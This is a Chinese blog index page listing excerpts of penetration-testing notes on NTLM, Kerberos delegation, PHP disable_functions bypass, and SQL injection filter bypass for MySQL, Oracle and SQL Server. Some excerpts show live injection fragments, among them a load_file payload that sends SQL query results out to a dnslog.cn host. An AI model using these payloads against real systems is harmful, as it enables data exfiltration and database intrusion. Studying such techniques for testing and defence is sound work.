Ctrl_C+Ctrl_V - 博客园

2021年8月22日

摘要：一、NTLM hash和Net-NTLM hash 1、NTLM hash是指Windows系统下Security Account Manager中保存的用户密码hash 该hash的生成方法：将明文口令转换成十六进制的格式转换成Unicode格式，即在每个字节之后添加0x00 对Unicode 阅读全文

posted @ 2021-08-22 18:52 Ctrl_C+Ctrl_V 阅读(121) 评论(0) 推荐(0)

Kerberos简介

摘要：一、Kerberos简介在Kerberos认证中，最主要的问题是如何证明“你是你”的问题，如当一个Client去访问Server服务器上的某服务时，Server如何判断Client是否有权限来访问自己主机上的服务，同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性，这正是Kerbe 阅读全文

posted @ 2021-08-22 17:05 Ctrl_C+Ctrl_V 阅读(432) 评论(0) 推荐(0)

2021年8月21日

委派

摘要： 1、委派在域中如果出现A使用Kerberos身份验证访问域中的服务B，而B再利用A的身份去请求域中的服务C，这个过程就可以理解为委派。 User访问主机s2上的HTTP服务，而HTTP服务需要请求其他主机的SQLServer数据库，但是S2并不知道User是否有权限访问SQLServer，这时HT 阅读全文

posted @ 2021-08-21 23:28 Ctrl_C+Ctrl_V 阅读(255) 评论(0) 推荐(0)

2021年8月2日

docker安装nignx并配置https

摘要：一、生成密钥和证书可以使用openssl或者cloudflare进行生成，根证书和key分别保存为server.crt和server.key 二、编辑虚拟主机配置文件注意：没有创建的文件夹需要创建对应的文件夹文件名为:dev.conf <VirtualHost *:443> DocumentR 阅读全文

posted @ 2021-08-02 20:33 Ctrl_C+Ctrl_V 阅读(74) 评论(0) 推荐(0)

2021年7月24日

php disable_functions绕过总结

摘要：零、php需要禁用的函数 phpinfo() 功能描述：输出 PHP 环境信息以及相关的模块、WEB 环境等信息。危险等级：中 passthru() 功能描述：允许执行一个外部程序并回显输出，类似于 exec()。危险等级：高 exec() 功能描述：允许执行一个外部程序（如 UNIX Shel 阅读全文

posted @ 2021-07-24 23:36 Ctrl_C+Ctrl_V 阅读(1070) 评论(0) 推荐(0)

带外通道

摘要：一、DNS 1、dnslog平台 http://www.dnslog.cn 2、sql注入使用load_file()函数，前提条件:secure_file_priv为空 select load_file('\\(sql语句).xxxx.dnslog.cn\aaa') 3、命令执行 Windows：阅读全文

posted @ 2021-07-24 10:59 Ctrl_C+Ctrl_V 阅读(120) 评论(0) 推荐(0)

2021年7月23日

文件操作Bypass

posted @ 2021-07-23 23:14 Ctrl_C+Ctrl_V 阅读(301) 评论(0) 推荐(0)

2021年7月22日

SQL注入bypass

摘要：一、数据库层特性 1、Mysql数据库bypass 1.参数和union之间 id=1\Nunion id=1.1union id=8e0union 2.union和select之间 union%0aselect union%09select union%0bselect union%0cselec 阅读全文

posted @ 2021-07-22 23:25 Ctrl_C+Ctrl_V 阅读(275) 评论(0) 推荐(0)

SQL注入之oracle数据库

摘要：一、union注入判断字段数量 order by 4 判断回显字段(先使用null进行填充) union select 1,null from dual 查询表名第一行表:union select null,(select table_name from user_tables where ro 阅读全文

posted @ 2021-07-22 21:58 Ctrl_C+Ctrl_V 阅读(257) 评论(0) 推荐(0)

SQL注入之SQL server数据库

摘要：一、union注入注意：前面需要闭合，后面需要注释符或者闭合判断字段数量 order by 3 查看回显字段(这里先使用null进行填充(不能像mysql使用1,2,3,4进行数据填充)，再使用'1'或者1判断数据的回显) union all select null,null,null from 阅读全文

posted @ 2021-07-22 21:48 Ctrl_C+Ctrl_V 阅读(93) 评论(0) 推荐(0)

Loading

Ctrl_C+Ctrl_V's Blog

公告